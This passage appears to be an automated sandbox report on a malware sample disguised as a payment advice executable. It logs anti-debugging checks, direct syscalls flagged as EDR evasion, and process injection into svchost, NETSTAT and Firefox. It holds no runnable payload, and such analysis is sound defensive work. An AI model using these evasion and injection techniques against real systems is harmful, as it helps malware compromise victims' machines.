            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730AD0 mov eax, dword ptr fs:[00000030h]1_2_03730AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]1_2_03764AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]1_2_03764AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]1_2_03738AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]1_2_03738AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786AA4 mov eax, dword ptr fs:[00000030h]1_2_03786AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768A90 mov edx, dword ptr fs:[00000030h]1_2_03768A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]1_2_037D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]1_2_037D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC97C mov eax, dword ptr fs:[00000030h]1_2_037BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]1_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov edx, dword ptr fs:[00000030h]1_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]1_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0946 mov eax, dword ptr fs:[00000030h]1_2_037B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B892A mov eax, dword ptr fs:[00000030h]1_2_037B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C892B mov eax, dword ptr fs:[00000030h]1_2_037C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC912 mov eax, dword ptr fs:[00000030h]1_2_037BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]1_2_03728918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]1_2_03728918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]1_2_037AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]1_2_037AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]1_2_037629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]1_2_037629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE9E0 mov eax, dword ptr fs:[00000030h]1_2_037BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037649D0 mov eax, dword ptr fs:[00000030h]1_2_037649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA9D3 mov eax, dword ptr fs:[00000030h]1_2_037FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C69C0 mov eax, dword ptr fs:[00000030h]1_2_037C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B89B3 mov esi, dword ptr fs:[00000030h]1_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]1_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]1_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]1_2_037309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]1_2_037309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]1_2_037BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]1_2_037BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]1_2_037C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]1_2_037C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760854 mov eax, dword ptr fs:[00000030h]1_2_03760854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]1_2_03734859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]1_2_03734859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03742840 mov ecx, dword ptr fs:[00000030h]1_2_03742840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov ecx, dword ptr fs:[00000030h]1_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A830 mov eax, dword ptr fs:[00000030h]1_2_0376A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D483A mov eax, dword ptr fs:[00000030h]1_2_037D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D483A mov eax, dword ptr fs:[00000030h]1_2_037D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC810 mov eax, dword ptr fs:[00000030h]1_2_037BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C8F9 mov eax, dword ptr fs:[00000030h]1_2_0376C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C8F9 mov eax, dword ptr fs:[00000030h]1_2_0376C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA8E4 mov eax, dword ptr fs:[00000030h]1_2_037FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E8C0 mov eax, dword ptr fs:[00000030h]1_2_0375E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC89D mov eax, dword ptr fs:[00000030h]1_2_037BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730887 mov eax, dword ptr fs:[00000030h]1_2_03730887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375AF69 mov eax, dword ptr fs:[00000030h]1_2_0375AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375AF69 mov eax, dword ptr fs:[00000030h]1_2_0375AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2F60 mov eax, dword ptr fs:[00000030h]1_2_037D2F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2F60 mov eax, dword ptr fs:[00000030h]1_2_037D2F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372CF50 mov eax, dword ptr fs:[00000030h]1_2_0372CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372CF50 mov eax, dword ptr fs:[00000030h]1_2_0372CF50
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 5848Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\NETSTAT.EXEThread APC queued: target process: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B5B008Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe"Jump to behavior
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"Jump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
            Source: PAYMENT ADVISE#9879058.exe, eYlgnnKYnAjqSS.exe, 00000005.00000002.2959229349.0000000001781000.00000002.00000001.00040000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000005.00000000.2255964159.0000000001781000.00000002.00000001.00040000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000007.00000000.2409609172.0000000001631000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: eYlgnnKYnAjqSS.exe, 00000005.00000002.2959229349.0000000001781000.00000002.00000001.00040000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000005.00000000.2255964159.0000000001781000.00000002.00000001.00040000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000007.00000000.2409609172.0000000001631000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: PAYMENT ADVISE#9879058.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: eYlgnnKYnAjqSS.exe, 00000005.00000002.2959229349.0000000001781000.00000002.00000001.00040000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000005.00000000.2255964159.0000000001781000.00000002.00000001.00040000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000007.00000000.2409609172.0000000001631000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
